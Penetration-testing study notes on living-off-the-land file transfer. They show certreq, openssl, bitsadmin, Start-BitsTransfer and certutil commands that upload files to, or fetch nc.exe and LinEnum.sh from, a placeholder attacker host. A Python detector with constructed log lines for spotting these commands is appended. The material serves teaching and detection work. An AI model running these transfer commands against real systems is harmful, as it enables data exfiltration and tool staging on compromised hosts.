- two websites that aggregate information on living off the land binaries
  - LOLBAS for Windows binaries
  - GTFOBins for Linux binaries

# LOLBAS

- search for "/upload"
- results: `CertReq.exe`, `ConfigSecurityPolicy.exe`, and `DataSvcUtil.exe`

```cmd
:: example upload from Windows using CertReq.exe
certreq.exe -Post -config http://<kali_host_ip>:<port>/ C:\Users\htb\Desktop\test.txt
```

```bash
# catch the upload with netcat on the Kali host
sudo nc -lvnp 8000
```

# GTFOBins

- search for "+file download"
- results: `ab`, `bash`, `cpan`, `curl`, ... , `openssl`

```bash
# setup on the Kali host
openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out cert.pem   # create a self-signed cert
openssl s_server -quiet -accept 80 -cert cert.pem -key key.pem < /tmp/LinEnum.sh    # serve LinEnum.sh on port 80
```

```bash
# download the file on the compromised target
openssl s_client -connect <kali_host_ip>:80 -quiet > LinEnum.sh
```

# Other Common Living off the Land Tools

## Bitsadmin

- Background Intelligent Transfer Service (BITS) can be used to download files from HTTP sites or SMB shares
- BITS checks host and network utilization to minimize the impact on the user's foreground work

```powershell
# download nc.exe with the bitsadmin CLI
bitsadmin /transfer wcb /priority foreground http://<kali_host_ip>:8000/nc.exe C:\Users\htb\Desktop\nc.exe
# download nc.exe with the BitsTransfer PowerShell module
Import-Module bitstransfer; Start-BitsTransfer -Source "http://<target_ip>:80/nc.exe" -Destination "C:\Windows\Temp\nc.exe"
```

## CertUtil

- tool that can be used to download arbitrary files, similar to wget
- its usage may be detected by the Antimalware Scan Interface (AMSI)

```cmd
:: download nc.exe over HTTP
certutil.exe -verifyctl -split -f http://<target_ip>:8000/nc.exe
```
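As an added example that is not part of these notes: a small Python detector run over constructed process command-line samples (the kind exported from Sysmon Event ID 1, Security 4688 with command-line auditing, or auditd execve records). It matches the exact flag combinations shown above (certutil `-verifyctl -split -f`, `bitsadmin /transfer`, `Start-BitsTransfer`, `certreq -Post -config`, `openssl s_client -connect`) while leaving routine use of the same binaries alone. The log lines and the 10.10.14.5 host are constructed placeholders.

```python
import re

# Constructed sample process command lines, as exported from Sysmon Event ID 1,
# Security 4688 (with command-line auditing) or auditd execve records.
# 10.10.14.5 is a placeholder for the attacker-controlled listener.
SAMPLE_LOGS = [
    "certutil.exe -verifyctl -split -f http://10.10.14.5:8000/nc.exe",
    "certutil.exe -hashfile C:\\Windows\\System32\\calc.exe SHA256",
    "bitsadmin /transfer wcb /priority foreground http://10.10.14.5:8000/nc.exe C:\\Users\\htb\\Desktop\\nc.exe",
    "bitsadmin /list /allusers",
    "powershell.exe -c \"Import-Module bitstransfer; Start-BitsTransfer -Source 'http://10.10.14.5/nc.exe' -Destination 'C:\\Windows\\Temp\\nc.exe'\"",
    "certreq.exe -Post -config http://10.10.14.5:8000/ C:\\Users\\htb\\Desktop\\test.txt",
    "openssl s_client -connect 10.10.14.5:80 -quiet",
    "openssl x509 -in cert.pem -noout -text",
]

URL = r"(?P<remote>https?://[^\s\"']+)"

# One rule per technique on this page. Each requires the flag combination that
# actually moves a file plus a remote endpoint, so routine local use of the same
# binary (hashing a file, listing jobs, inspecting a certificate) does not fire.
RULES = {
    "certutil-download": re.compile(
        r"\bcertutil(?:\.exe)?\b(?=.*\s-verifyctl\b)(?=.*\s-split\b).*\s-f\s+" + URL, re.I),
    "bitsadmin-download": re.compile(
        r"\bbitsadmin(?:\.exe)?\b\s+/transfer\b.*\s" + URL + r"\s+(?P<path>\S+)", re.I),
    "start-bitstransfer-download": re.compile(
        r"\bStart-BitsTransfer\b.*-Source\s+[\"']?" + URL
        + r"[\"']?\s+-Destination\s+[\"']?(?P<path>[^\s\"']+)", re.I),
    "certreq-upload": re.compile(
        r"\bcertreq(?:\.exe)?\b.*\s-Post\b.*\s-config\s+" + URL + r"\s+(?P<path>\S+)", re.I),
    "openssl-s_client-download": re.compile(
        r"\bopenssl\s+s_client\b.*-connect\s+(?P<remote>[^\s\"']+)", re.I),
}


def detect_lolbin_transfers(command_lines):
    """Return one finding (rule, remote endpoint, local path, raw line) per matching command line."""
    findings = []
    for line in command_lines:
        for name, rule in RULES.items():
            m = rule.search(line)
            if m:
                findings.append({"rule": name, "remote": m.group("remote"),
                                 "path": m.groupdict().get("path"), "command": line})
                break  # one finding per command line is enough for an alert
    return findings
```

Feeding real exports in place of `SAMPLE_LOGS` gives one alert per transfer with the remote endpoint and dropped file path ready for triage; the benign lines (hashfile, /list, x509) produce nothing.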